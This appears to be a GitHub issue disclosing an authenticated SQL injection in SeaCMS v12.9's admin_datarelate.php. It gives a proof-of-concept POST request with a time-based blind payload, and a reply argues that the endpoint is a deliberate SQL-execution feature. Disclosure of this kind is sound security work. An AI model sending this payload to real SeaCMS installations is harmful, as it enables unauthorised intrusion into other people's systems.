CMS icon indicating copy to clipboard operation
CMS copied to clipboard
Published 4 months ago verified publisher icon seacms-net

Authenticated SQL Injection in SeaCMS v12.9

Open Tddddddddd opened this issue 1 year ago • 1 comments

Summary SeaCMS v12.9 has an authenticated SQL injection vulnerability in the {random}/admin_datarelate.php file, where user provided data is directly used for SQL queries without proper cleaning image Proof of Concept (PoC)

POST /{random_path}/admin_datarelate.php?action=result HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

sql=(select 1 from (select(sleep(5)))x)

image

Tddddddddd avatar Jul 04 '24 01:07 Tddddddddd

This function is a dedicated place in the SeaCMS backend to execute sql code, so no filtering restrictions are possible.

lem0n817 avatar Jan 09 '25 01:01 lem0n817